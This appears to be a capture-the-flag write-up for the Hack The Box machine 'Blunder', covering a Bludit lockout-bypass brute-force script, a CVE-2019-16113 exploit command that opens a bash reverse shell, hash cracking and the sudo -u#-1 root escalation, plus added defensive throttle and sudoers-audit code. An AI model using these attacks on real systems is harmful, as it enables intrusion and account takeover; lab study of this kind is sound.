Blunder is a Linux box with the IP address 10.10.10.191. Let's start with an nmap scan and some enumeration.
#nmap
Nmap scan report for 10.10.10.191
Host is up (0.32s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http?
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: OPTIONS
|_http-title: Blunder | A blunder of interesting facts
#dirsearch
python3 dirsearch.py -u http://10.10.10.191 -e *

Target: http://10.10.10.191

[11:44:57] Starting
[11:45:01] 200 -   7KB - /%3f/
[11:45:10] 200 -  563B - /.gitignore
[11:45:30] 200 -   7KB - /0
[11:45:56] 200 -   3KB - /about
[11:46:04] 301 -    0B - /admin  ->  http://10.10.10.191/admin/
[11:46:08] 200 -   2KB - /admin/
[11:46:08] 200 -   2KB - /admin/.config
#wfuzz
wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt"
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.191/FUZZ.txt
Total requests: 4658

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000003519:   200        1 L      4 W      22 Ch       "robots"
000004125:   200        4 L      23 W     118 Ch      "todo"
Dig into todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
So we have a username, fergus, for the admin panel and a hint that the site runs Bludit CMS. Password guessing didn't work, so fall back on the common methodology: build a wordlist from the site with cewl and try to bruteforce the login.
#cewl
cewl -w passwords.txt -d 10 -m 1 http://10.10.10.191
Tried different brute-force tools, but none of them worked because of Bludit's brute-force mitigation, which locks out a client after too many failed logins. The bypass is described here: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
bruteforce.py (adapted from the PoC in the post above; the lockout is keyed on the client IP that Bludit reads from the X-Forwarded-For header, so each attempt sends a different value there)

#!/usr/bin/env python3
import re
import requests


def open_ressources(file_path):
    # Read the cewl wordlist, one candidate password per line
    with open(file_path) as f:
        return [item.replace("\n", "") for item in f.readlines()]


host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/passwords.txt')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # The login form carries a CSRF token that has to be echoed back
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p=password))

    headers = {
        'X-Forwarded-For': password,  # unique per attempt, so the per-IP counter never fills
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

    # A successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break
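To see why the lockout above is so easy to get around, and what the fix looks like, here is an added example (my own code, not part of the writeup and not Bludit's implementation) that models the mitigation as an in-memory per-IP failure counter. The weak version keys the counter on X-Forwarded-For exactly as the bypass relies on; the hardened version keys on the TCP peer address and only honours X-Forwarded-For when the peer is a known reverse proxy. It also keeps a per-username failure count, which still fires an alert when the per-IP counter has been evaded. The threshold, the proxy address and the rotating client addresses are all constructed for the demo.

```python
from collections import defaultdict

MAX_FAILURES = 10  # assumed lockout threshold, chosen for the demo


class LoginThrottle:
    """Per-IP failed-login counter in the style of Bludit's mitigation."""

    def __init__(self, trust_forwarded_for, trusted_proxies=()):
        self.trust_forwarded_for = trust_forwarded_for
        self.trusted_proxies = set(trusted_proxies)
        self.failures_by_ip = defaultdict(int)
        self.failures_by_user = defaultdict(int)

    def client_ip(self, peer_addr, headers):
        """Decide which address the failure counter is keyed on."""
        xff = headers.get("X-Forwarded-For", "")
        if self.trust_forwarded_for and xff:
            # Weak setting: the header is client controlled, so the sender
            # picks the bucket every attempt is counted in.
            return xff.split(",")[0].strip()
        if xff and peer_addr in self.trusted_proxies:
            # Hardened setting: honour the header only when the TCP peer is
            # our own reverse proxy, and use the address that proxy appended.
            return xff.split(",")[-1].strip()
        return peer_addr

    def attempt(self, peer_addr, headers, username, password_ok):
        ip = self.client_ip(peer_addr, headers)
        if self.failures_by_ip[ip] >= MAX_FAILURES:
            return "locked"
        if password_ok:
            self.failures_by_ip[ip] = 0
            return "ok"
        self.failures_by_ip[ip] += 1
        self.failures_by_user[username] += 1  # used for alerting, not lockout
        return "denied"

    def alerts(self):
        """Usernames whose failures crossed the threshold, whatever the IPs."""
        return sorted(u for u, n in self.failures_by_user.items() if n >= MAX_FAILURES)


def simulate_rotating_xff(throttle, attempts, peer_addr="10.10.14.245", username="fergus"):
    """Replay the writeup's pattern: every failed attempt carries a new X-Forwarded-For."""
    outcomes = defaultdict(int)
    for i in range(attempts):
        headers = {"X-Forwarded-For": f"198.51.100.{i % 250 + 1}"}  # constructed addresses
        outcomes[throttle.attempt(peer_addr, headers, username, password_ok=False)] += 1
    return dict(outcomes)


if __name__ == "__main__":
    weak = LoginThrottle(trust_forwarded_for=True)
    hard = LoginThrottle(trust_forwarded_for=False, trusted_proxies={"10.0.0.2"})
    print("weak:", simulate_rotating_xff(weak, 50), "alerts:", weak.alerts())
    print("hard:", simulate_rotating_xff(hard, 50), "alerts:", hard.alerts())
```

With 50 wrong passwords the weak throttle lets every one of them reach the password check, while the hardened one stops after 10; in both cases the per-username counter flags fergus, which is the signal a defender should be watching for in the access logs of a site behind a CDN or load balancer, where the socket peer is always the proxy.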
That gives fergus:RolandDeschain. Log into Bludit with it, then check for CVEs against Bludit CMS: CVE-2019-16113.
https://github.com/cybervaca/CVE-2019-16113 // this exploit is written in Python; you can also go with the Metasploit module, https://www.exploit-db.com/exploits/47699
I used the exploit from GitHub.
python3 CVE-2019-16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/10.10.14.245/1337 0>&1'"

Listen on the chosen port, in this case 1337:
nc -lvp 1337
After getting the reverse shell, dig into the files under /var/www/bludit-3.10.0a/bl-content/databases/; in this directory there is a users.php file.

It contains a hash value. First identify it (it's SHA1), then crack it online at https://md5decrypt.net/en/Sha1/
faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120
#user
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120
cat user.txt
13270375df398ae7fb7f28d27117d7aa
Now try the simple methods for getting root. sudo -l shows that hugo can run /bin/bash as (ALL, !root).
A quick Google search for (ALL, !root) /bin/bash turns up https://www.exploit-db.com/exploits/47502
#root
$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
root@blunder:/root# cat root.txt
cat root.txt
1116025955c775dd9462ff1f6f4bdd68
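The root step works because the sudoers rule relies on a deny-list: the Runas spec grants ALL and then subtracts root, and sudo releases before 1.8.28 resolved the numeric user id -1 (and its unsigned form 4294967295) to uid 0 when given as -u#-1, so the subtraction never applied. The following is an added example, my own code rather than anything from the writeup or from the sudo project, that audits sudoers-style rules (and sudo -l output lines) for that pattern and notes whether the installed sudo version still has the bug. The sample rules and the version strings are constructed for the demo.

```python
import re
from typing import List, NamedTuple

FIXED_VERSION = (1, 8, 28)  # first sudo release that rejects the -1 / 4294967295 uid trick
RUNAS_RE = re.compile(r"\((?P<spec>[^)]*)\)")  # the "(user[:group])" part of a rule
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


class Finding(NamedTuple):
    line: str
    reason: str


def parse_version(text: str):
    """'1.8.25p1' -> (1, 8, 25); patch suffixes do not matter for this check."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised sudo version: {text!r}")
    return tuple(int(x) for x in m.groups())


def runas_users(line: str) -> List[str]:
    """Users listed in the Runas spec; a rule without one means root only."""
    m = RUNAS_RE.search(line)
    if not m:
        return []
    users = m.group("spec").split(":")[0]  # drop the optional ":group" half
    return [u.strip() for u in users.split(",") if u.strip()]


def audit(sudoers_lines: List[str], sudo_version: str) -> List[Finding]:
    """Flag rules that grant ALL as Runas user and then carve out exclusions."""
    bug_present = parse_version(sudo_version) < FIXED_VERSION
    findings = []
    for raw in sudoers_lines:
        line = raw.split("#", 1)[0].strip()  # strip comments and blank lines
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        users = runas_users(line)
        excluded = [u for u in users if u.startswith("!")]
        if "ALL" in users and excluded:
            reason = f"Runas ALL combined with exclusion {', '.join(excluded)}; " \
                     "list the allowed target users instead of subtracting from ALL"
            if bug_present:
                reason += f"; sudo {sudo_version} maps uid -1 to root, so the exclusion is bypassable"
            findings.append(Finding(line, reason))
    return findings


if __name__ == "__main__":
    sample_rules = [  # constructed, modelled on the rule the writeup finds
        "# User privilege specification",
        "root    ALL=(ALL:ALL) ALL",
        "%sudo   ALL=(ALL:ALL) ALL",
        "hugo    ALL=(ALL, !root) /bin/bash",
    ]
    for f in audit(sample_rules, "1.8.25p1"):
        print(f.line, "->", f.reason)
```

Running the audit against the constructed rules reports only hugo's entry, and because the assumed version 1.8.25p1 is older than 1.8.28 the finding also says the exclusion is bypassable; on a patched host the rule is still reported, since a deny-list in a Runas spec is a fragile control whatever the sudo version, and the fix is to name the intended target user explicitly.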
Hope you enjoy it 😀